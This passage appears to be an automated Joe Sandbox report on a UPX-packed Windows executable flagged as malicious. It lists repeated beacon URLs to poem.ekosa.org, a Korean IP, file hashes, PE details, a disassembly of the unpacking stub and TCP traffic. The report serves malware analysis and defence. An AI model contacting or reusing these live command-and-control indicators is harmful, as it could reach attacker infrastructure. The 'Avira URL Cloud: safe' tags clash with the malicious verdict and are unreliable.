http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6uinfo.asp?id=dn6786WVbU1Gf5p8.exe, 00000000.00000003.709608423.00000000016AA000.00000004.00000001.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6uXWVbU1Gf5p8.exe, 00000000.00000003.915925652.00000000016C6000.00000004.00000001.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://poem.ekosa.org/intro/info/info.asp?id=dn678BWVbU1Gf5p8.exe, 00000000.00000003.781250554.000000000168F000.00000004.00000001.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6uinfo.asp?id=dn678WVbU1Gf5p8.exe, 00000000.00000003.709608423.00000000016AA000.00000004.00000001.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://poem.ekosa.org/intro/info/info.asp.batWVbU1Gf5p8.exe, 00000000.00000002.1002474836.0000000001231000.00000040.00020000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://poem.ekosa.org/intro/info/info.asp?id=dn678l;WVbU1Gf5p8.exe, 00000000.00000003.781250554.000000000168F000.00000004.00000001.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6uLWVbU1Gf5p8.exe, 00000000.00000003.781276052.00000000016C6000.00000004.00000001.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://poem.ekosa.org/intro/info/info.asp?id=dn6786WVbU1Gf5p8.exe, 00000000.00000003.781250554.000000000168F000.00000004.00000001.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6uinfo.asp?id=dn678l;WVbU1Gf5p8.exe, 00000000.00000003.709608423.00000000016AA000.00000004.00000001.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6uOWVbU1Gf5p8.exe, 00000000.00000003.923239328.000000000168F000.00000004.00000001.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://poem.ekosa.org/intro/info/info.asp?id=dn6780;WVbU1Gf5p8.exe, 00000000.00000003.709608423.00000000016AA000.00000004.00000001.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6uPWVbU1Gf5p8.exe, 00000000.00000003.915925652.00000000016C6000.00000004.00000001.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://poem.ekosa.org/intro/info/info.asp?id=dn678:WVbU1Gf5p8.exe, 00000000.00000002.1002662893.000000000168F000.00000004.00000020.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://poem.ekosa.org/intro/info/info.asp?id=dn678Z;qWVbU1Gf5p8.exe, 00000000.00000003.781250554.000000000168F000.00000004.00000001.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6uerWVbU1Gf5p8.exe, 00000000.00000003.915925652.00000000016C6000.00000004.00000001.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6udWVbU1Gf5p8.exe, 00000000.00000003.915925652.00000000016C6000.00000004.00000001.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://poem.ekosa.org/intro/info/info.asp?id=dn678nWVbU1Gf5p8.exe, 00000000.00000003.915864738.000000000168F000.00000004.00000001.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://poem.ekosa.org/intro/info/info.asp?id=dn678rWVbU1Gf5p8.exe, 00000000.00000003.781250554.000000000168F000.00000004.00000001.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6uinfo.asp?id=dn678H;cWVbU1Gf5p8.exe, 00000000.00000003.781250554.000000000168F000.00000004.00000001.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6uinfo.asp?id=dn678kWVbU1Gf5p8.exe, 00000000.00000003.709608423.00000000016AA000.00000004.00000001.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://poem.ekosa.org/intro/info/info.asp?id=dn678kWVbU1Gf5p8.exe, 00000000.00000003.781250554.000000000168F000.00000004.00000001.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://poem.ekosa.org/intro/info/info.asp?id=dn678jWVbU1Gf5p8.exe, 00000000.00000002.1002662893.000000000168F000.00000004.00000020.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://poem.ekosa.org/intro/info/info.asp?id=dn678~;WVbU1Gf5p8.exe, 00000000.00000003.709608423.00000000016AA000.00000004.00000001.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://poem.ekosa.org/intro/info/info.asp?id=dn678T;OWVbU1Gf5p8.exe, 00000000.00000003.709608423.00000000016AA000.00000004.00000001.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6uvWVbU1Gf5p8.exe, 00000000.00000003.915925652.00000000016C6000.00000004.00000001.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6uinfo.asp?id=dn678~;WVbU1Gf5p8.exe, 00000000.00000003.923239328.000000000168F000.00000004.00000001.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://poem.ekosa.org/intro/info/info.aspWVbU1Gf5p8.exe, WVbU1Gf5p8.exe, 00000000.00000002.1002492548.0000000001249000.00000040.00020000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://poem.ekosa.org/intro/info/info.asp?id=dn678H;cWVbU1Gf5p8.exe, 00000000.00000003.709608423.00000000016AA000.00000004.00000001.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6ulWVbU1Gf5p8.exe, 00000000.00000003.709608423.00000000016AA000.00000004.00000001.sdmpfalse
    		unknown
    http://poem.ekosa.org/intro/info/info.asp?id=dn678VWVbU1Gf5p8.exe, 00000000.00000003.781250554.000000000168F000.00000004.00000001.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6umWVbU1Gf5p8.exe, 00000000.00000003.709608423.00000000016AA000.00000004.00000001.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6u.WVbU1Gf5p8.exe, 00000000.00000003.915925652.00000000016C6000.00000004.00000001.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6uqWVbU1Gf5p8.exe, 00000000.00000003.709608423.00000000016AA000.00000004.00000001.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6urmWVbU1Gf5p8.exe, 00000000.00000003.915864738.000000000168F000.00000004.00000001.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6urWVbU1Gf5p8.exe, 00000000.00000003.709608423.00000000016AA000.00000004.00000001.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6uDWVbU1Gf5p8.exe, 00000000.00000003.915925652.00000000016C6000.00000004.00000001.sdmpfalse
      		unknown
      http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6uEWVbU1Gf5p8.exe, 00000000.00000003.781250554.000000000168F000.00000004.00000001.sdmpfalse
      • Avira URL Cloud: safe
      		unknown
      http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6uJWVbU1Gf5p8.exe, 00000000.00000003.915925652.00000000016C6000.00000004.00000001.sdmpfalse
      • Avira URL Cloud: safe
      		unknown
      http://poem.ekosa.org/intro/info/info.asp?id=dn678FWVbU1Gf5p8.exe, 00000000.00000003.781250554.000000000168F000.00000004.00000001.sdmpfalse
      • Avira URL Cloud: safe
      		unknown

      Contacted IPs

      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs

      Public

      IPDomainCountryFlagASNASN NameMalicious
      210.116.91.80
      		unknownKorea Republic of
      		17881INETHOSTING-AS-KRInetHostingIncKRfalse

      General Information

      Joe Sandbox Version:31.0.0 Red Diamond
      Analysis ID:338142
      Start date:11.01.2021
      Start time:17:54:08
      Joe Sandbox Product:CloudBasic
      Overall analysis duration:0h 5m 38s
      Hypervisor based Inspection enabled:false
      Report type:full
      Sample file name:WVbU1Gf5p8 (renamed file extension from none to exe)
      Cookbook file name:default.jbs
      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
      Number of analysed new started processes analysed:14
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • HDC enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Detection:MAL
      Classification:mal60.winEXE@1/0@1/1
      EGA Information:
      • Successful, ratio: 100%
      HDC Information:
      • Successful, ratio: 29.9% (good quality ratio 25.8%)
      • Quality average: 67.9%
      • Quality standard deviation: 33.9%
      HCA Information:Failed
      Cookbook Comments:
      • Adjust boot time
      • Enable AMSI
      Warnings:
      Show All
      • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe
      • Excluded IPs from analysis (whitelisted): 104.42.151.234, 51.11.168.160, 92.122.213.194, 92.122.213.247, 20.54.26.129, 2.20.142.209, 2.20.142.210, 13.107.4.50, 51.104.144.132
      • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, c-0001.c-msedge.net, a767.dscg3.akamai.net, a1449.dscg2.akamai.net, arc.msn.com, afdap.au.au-msedge.net, ris.api.iris.microsoft.com, au.au-msedge.net, blobcollector.events.data.trafficmanager.net, audownload.windowsupdate.nsatc.net, au.c-0001.c-msedge.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, elasticShed.au.au-msedge.net, skypedataprdcolwus16.cloudapp.net, au-bg-shim.trafficmanager.net
      • Report size getting too big, too many NtDeviceIoControlFile calls found.
      • Report size getting too big, too many NtOpenKeyEx calls found.
      • Report size getting too big, too many NtQueryValueKey calls found.

      Simulations

      Behavior and APIs

      TimeTypeDescription
      17:54:57API Interceptor95x Sleep call for process: WVbU1Gf5p8.exe modified

      Joe Sandbox View / Context

      IPs

      No context

      Domains

      No context

      ASN

      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
      INETHOSTING-AS-KRInetHostingIncKRv-cnsamc.comGet hashmaliciousBrowse
      • 210.116.102.95

      JA3 Fingerprints

      No context

      Dropped Files

      No context

      Created / dropped Files

      No created / dropped files found

      Static File Info

      General

      File type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
      Entropy (8bit):7.882358315267644
      TrID:
      • Win32 Executable (generic) a (10002005/4) 99.39%
      • UPX compressed Win32 Executable (30571/9) 0.30%
      • Win32 EXE Yoda's Crypter (26571/9) 0.26%
      • Generic Win/DOS Executable (2004/3) 0.02%
      • DOS Executable Generic (2002/1) 0.02%
      File name:WVbU1Gf5p8.exe
      File size:51000
      MD5:69f7cde70cc22aceb5dd32ff1dc3f685
      SHA1:f87ee3079aaa5230e107ff9684e7cdea2162caf6
      SHA256:625f63364312cec78a4c91abedba868d551d79185ff73e388f561017b13347f0
      SHA512:336c07df36c691ebed0e31f1487638bcfa1ed60e4c1aaf8122c26d42682c43b270439462eaa3d9c3dbdbf0399d0a2ce7383f6075a1d13462033a1062367b9f3e
      SSDEEP:1536:lL4aKdQ/4YJs343x7gpIgMSDfh+Ampoy5Snouy8s:lLSy3SexsxT/mpooKouts
      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......h$y.,E..,E..,E......&E......VE......4E......=E......1E......=E..%=..)E..,E..NE.......E......-E......-E..Rich,E..........PE..L..

      File Icon

      Icon Hash:00828e8e8686b000

      Static PE Info

      General

      Entrypoint:0x41eff0
      Entrypoint Section:UPX1
      Digitally signed:false
      Imagebase:0x400000
      Subsystem:windows gui
      Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
      DLL Characteristics:TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
      Time Stamp:0x5C503954 [Tue Jan 29 11:30:28 2019 UTC]
      TLS Callbacks:
      CLR (.Net) Version:
      OS Version Major:5
      OS Version Minor:1
      File Version Major:5
      File Version Minor:1
      Subsystem Version Major:5
      Subsystem Version Minor:1
      Import Hash:7a4f310606e49745a3cf26a768e6e489

      Entrypoint Preview

      Instruction
      pushad
      mov esi, 00414000h
      lea edi, dword ptr [esi-00013000h]
      push edi
      mov ebp, esp
      lea ebx, dword ptr [esp-00003E80h]
      xor eax, eax
      push eax
      cmp esp, ebx
      jne 00007F0870A387FDh
      inc esi
      inc esi
      push ebx
      push 0001CEEFh
      push edi
      add ebx, 04h
      push ebx
      push 0000AFE1h
      push esi
      add ebx, 04h
      push ebx
      push eax
      mov dword ptr [ebx], 00000003h
      nop
      nop
      nop
      nop
      nop
      push ebp
      push edi
      push esi
      push ebx
      sub esp, 7Ch
      mov edx, dword ptr [esp+00000090h]
      mov dword ptr [esp+74h], 00000000h
      mov byte ptr [esp+73h], 00000000h
      mov ebp, dword ptr [esp+0000009Ch]
      lea eax, dword ptr [edx+04h]
      mov dword ptr [esp+78h], eax
      mov eax, 00000001h
      movzx ecx, byte ptr [edx+02h]
      mov ebx, eax
      shl ebx, cl
      mov ecx, ebx
      dec ecx
      mov dword ptr [esp+6Ch], ecx
      movzx ecx, byte ptr [edx+01h]
      shl eax, cl
      dec eax
      mov dword ptr [esp+68h], eax
      mov eax, dword ptr [esp+000000A8h]
      movzx esi, byte ptr [edx]
      mov dword ptr [ebp+00h], 00000000h
      mov dword ptr [esp+60h], 00000000h
      mov dword ptr [eax], 00000000h
      mov eax, 00000300h
      mov dword ptr [esp+64h], esi
      mov dword ptr [esp+5Ch], 00000001h
      mov dword ptr [esp+58h], 00000001h
      mov dword ptr [esp+54h], 00000001h

      Rich Headers

      Programming Language:
      • [LNK] VS2015 build 23026
      • [RES] VS2015 build 23026
      • [IMP] VS2008 SP1 build 30729

      Data Directories

      NameVirtual AddressVirtual Size Is in Section
      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
      IMAGE_DIRECTORY_ENTRY_IMPORT0x201dc0xe8.rsrc
      IMAGE_DIRECTORY_ENTRY_RESOURCE0x200000x1dc.rsrc
      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
      IMAGE_DIRECTORY_ENTRY_BASERELOC0x202c40x1c.rsrc
      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x1fbd80x5cUPX1
      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
      IMAGE_DIRECTORY_ENTRY_IAT0x00x0
      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

      Sections

      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
      UPX00x10000x130000x0False0empty0.0IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
      UPX10x140000xc0000xbe00False0.969078947368data7.95760709074IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
      .rsrc0x200000x10000x400False0.421875data3.96402926863IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ

      Resources

      NameRVASizeTypeLanguageCountry
      RT_MANIFEST0x2005c0x17dXML 1.0 document textEnglishUnited States

      Imports

      DLLImport
      KERNEL32.DLLLoadLibraryA, GetProcAddress, VirtualProtect, VirtualAlloc, VirtualFree, ExitProcess
      ADVAPI32.dllSystemFunction036

      Possible Origin

      Language of compilation systemCountry where language is spokenMap
      EnglishUnited States

      Network Behavior

      Network Port Distribution

      TCP Packets

      TimestampSource PortDest PortSource IPDest IP
      Jan 11, 2021 17:54:56.426768064 CET4975680192.168.2.4210.116.91.80
      Jan 11, 2021 17:54:56.688230038 CET8049756210.116.91.80192.168.2.4
      Jan 11, 2021 17:54:56.688385963 CET4975680192.168.2.4210.116.91.80
      Jan 11, 2021 17:54:56.689865112 CET4975680192.168.2.4210.116.91.80
      Jan 11, 2021 17:54:56.951431990 CET8049756210.116.91.80192.168.2.4
      Jan 11, 2021 17:54:56.951577902 CET4975680192.168.2.4210.116.91.80
      Jan 11, 2021 17:54:56.951904058 CET4975680192.168.2.4210.116.91.80
      Jan 11, 2021 17:54:56.959117889 CET4975880192.168.2.4210.116.91.80
      Jan 11, 2021 17:54:57.212683916 CET8049756210.116.91.80192.168.2.4
      Jan 11, 2021 17:54:57.221164942 CET8049758210.116.91.80192.168.2.4
      Jan 11, 2021 17:54:57.221637011 CET4975880192.168.2.4210.116.91.80
      Jan 11, 2021 17:54:57.222948074 CET4975880192.168.2.4210.116.91.80
      Jan 11, 2021 17:54:57.485622883 CET8049758210.116.91.80192.168.2.4
      Jan 11, 2021 17:54:57.485812902 CET4975880192.168.2.4210.116.91.80
      Jan 11, 2021 17:54:57.486080885 CET4975880192.168.2.4210.116.91.80
      Jan 11, 2021 17:54:57.494767904 CET4975980192.168.2.4210.116.91.80
      Jan 11, 2021 17:54:57.748080015 CET8049758210.116.91.80192.168.2.4
      Jan 11, 2021 17:54:57.753647089 CET8049759210.116.91.80192.168.2.4
      Jan 11, 2021 17:54:57.753793001 CET4975980192.168.2.4210.116.91.80
      Jan 11, 2021 17:54:57.754849911 CET4975980192.168.2.4210.116.91.80
      Jan 11, 2021 17:54:58.014203072 CET8049759210.116.91.80192.168.2.4
      Jan 11, 2021 17:54:58.014525890 CET4975980192.168.2.4210.116.91.80
      Jan 11, 2021 17:54:58.014581919 CET4975980192.168.2.4210.116.91.80
      Jan 11, 2021 17:54:58.138900995 CET4976180192.168.2.4210.116.91.80
      Jan 11, 2021 17:54:58.273649931 CET8049759210.116.91.80192.168.2.4
      Jan 11, 2021 17:54:58.403007030 CET8049761210.116.91.80192.168.2.4
      Jan 11, 2021 17:54:58.403090954 CET4976180192.168.2.4210.116.91.80
      Jan 11, 2021 17:54:58.403862000 CET4976180192.168.2.4210.116.91.80
      Jan 11, 2021 17:54:58.668386936 CET8049761210.116.91.80192.168.2.4
      Jan 11, 2021 17:54:58.668536901 CET4976180192.168.2.4210.116.91.80
      Jan 11, 2021 17:54:58.668831110 CET4976180192.168.2.4210.116.91.80
      Jan 11, 2021 17:54:58.675659895 CET4976280192.168.2.4210.116.91.80
      Jan 11, 2021 17:54:58.932600975 CET8049761210.116.91.80192.168.2.4
      Jan 11, 2021 17:54:58.936108112 CET8049762210.116.91.80192.168.2.4
      Jan 11, 2021 17:54:58.936343908 CET4976280192.168.2.4210.116.91.80
      Jan 11, 2021 17:54:58.937810898 CET4976280192.168.2.4210.116.91.80
      Jan 11, 2021 17:54:59.198338032 CET8049762210.116.91.80192.168.2.4
      Jan 11, 2021 17:54:59.198510885 CET4976280192.168.2.4210.116.91.80
      Jan 11, 2021 17:54:59.198682070 CET4976280192.168.2.4210.116.91.80
      Jan 11, 2021 17:54:59.221259117 CET4976380192.168.2.4210.116.91.80
      Jan 11, 2021 17:54:59.458458900 CET8049762210.116.91.80192.168.2.4
      Jan 11, 2021 17:54:59.488636971 CET8049763210.116.91.80192.168.2.4
      Jan 11, 2021 17:54:59.488924980 CET4976380192.168.2.4210.116.91.80
      Jan 11, 2021 17:54:59.492043972 CET4976380192.168.2.4210.116.91.80
      Jan 11, 2021 17:54:59.760138988 CET8049763210.116.91.80192.168.2.4
      Jan 11, 2021 17:54:59.760399103 CET4976380192.168.2.4210.116.91.80
      Jan 11, 2021 17:54:59.760581970 CET4976380192.168.2.4210.116.91.80
      Jan 11, 2021 17:54:59.872613907 CET4976580192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:00.027846098 CET8049763210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:00.136830091 CET8049765210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:00.137089968 CET4976580192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:00.138458967 CET4976580192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:00.403141022 CET8049765210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:00.403307915 CET4976580192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:00.403438091 CET4976580192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:00.406855106 CET4976680192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:00.667313099 CET8049765210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:00.676996946 CET8049766210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:00.677155018 CET4976680192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:00.678997040 CET4976680192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:00.949650049 CET8049766210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:00.949882030 CET4976680192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:00.950048923 CET4976680192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:00.956501961 CET4976880192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:01.219989061 CET8049766210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:01.222208977 CET8049768210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:01.222369909 CET4976880192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:01.223732948 CET4976880192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:01.488401890 CET8049768210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:01.488492012 CET4976880192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:01.490192890 CET4976880192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:01.605155945 CET4976980192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:01.754262924 CET8049768210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:01.866909981 CET8049769210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:01.867063999 CET4976980192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:01.867994070 CET4976980192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:02.130270958 CET8049769210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:02.130368948 CET4976980192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:02.130969048 CET4976980192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:02.135477066 CET4977180192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:02.392546892 CET8049769210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:02.396588087 CET8049771210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:02.396747112 CET4977180192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:02.398149014 CET4977180192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:02.659898996 CET8049771210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:02.660130024 CET4977180192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:02.660479069 CET4977180192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:02.668045998 CET4977280192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:02.921279907 CET8049771210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:02.929611921 CET8049772210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:02.929838896 CET4977280192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:02.931457043 CET4977280192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:03.193223953 CET8049772210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:03.193450928 CET4977280192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:03.193942070 CET4977280192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:03.312998056 CET4977480192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:03.455095053 CET8049772210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:03.584038973 CET8049774210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:03.584239006 CET4977480192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:03.585913897 CET4977480192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:03.857309103 CET8049774210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:03.857587099 CET4977480192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:03.857774019 CET4977480192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:03.865760088 CET4977580192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:04.128398895 CET8049774210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:04.135067940 CET8049775210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:04.135181904 CET4977580192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:04.136393070 CET4977580192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:04.406142950 CET8049775210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:04.406230927 CET4977580192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:04.406481981 CET4977580192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:04.410854101 CET4977780192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:04.675609112 CET8049775210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:04.688966036 CET8049777210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:04.689074993 CET4977780192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:04.690062046 CET4977780192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:04.969022989 CET8049777210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:04.969175100 CET4977780192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:04.969511032 CET4977780192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:05.089497089 CET4977880192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:05.247128963 CET8049777210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:05.359301090 CET8049778210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:05.360687971 CET4977880192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:05.361941099 CET4977880192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:05.632652044 CET8049778210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:05.632777929 CET4977880192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:05.633013964 CET4977880192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:05.640492916 CET4978080192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:05.902441978 CET8049780210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:05.902477980 CET8049778210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:05.902580976 CET4978080192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:05.903429985 CET4978080192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:06.166101933 CET8049780210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:06.166346073 CET4978080192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:06.166601896 CET4978080192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:06.172944069 CET4978180192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:06.428056002 CET8049780210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:06.433820963 CET8049781210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:06.433918953 CET4978180192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:06.434833050 CET4978180192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:06.696373940 CET8049781210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:06.696662903 CET4978180192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:06.696863890 CET4978180192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:06.814651966 CET4978280192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:06.957480907 CET8049781210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:07.076378107 CET8049782210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:07.076508045 CET4978280192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:07.077856064 CET4978280192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:07.339922905 CET8049782210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:07.340029001 CET4978280192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:07.340199947 CET4978280192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:07.344656944 CET4978380192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:07.601526022 CET8049782210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:07.607625961 CET8049783210.116.91.80192.168.2.4
